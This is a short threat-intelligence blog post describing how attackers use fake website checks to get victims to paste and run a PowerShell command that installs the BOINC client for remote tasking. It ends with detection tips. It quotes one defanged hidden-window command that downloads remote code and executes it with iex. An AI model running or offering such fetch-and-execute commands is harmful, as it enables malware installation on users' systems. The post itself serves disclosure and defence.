015. Threat Actors Can Abuse Even This Kind of Software

Hello everyone! Recent Unit 42 notification reminded me about VERY curious legitimate software abused by adversaries. It's BOINC or Berkeley Open Infrastructure for Network Computing - open-source software that allows users to contribute computing power to scientific research projects focused on solving complex calculations.


Infection process is interesting as well. The victim is redicrected to a malicious website with fake checks and is instructed to paste and run a PowerShell script:

powershell -WindowStyle Hidden $global:block=curl -useb hxxp[:]//lggknhaffleahbh[.]top/1.php?s=527;iex $global:block.content

The script leads to installation of BOINC client. Why does adversary use BOINC? It can collect information and send tasks to the host for execution!

So, what to look for? Here're a few detection and hunting tips:

  • Look for renamed BOINC executables
  • Look for executables with metadata related to BOINC, for example: "BOINC Client", "boinc.exe", etc.
See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

001. The Zeltser Challenge

012. They Want to Know Everything About Your System!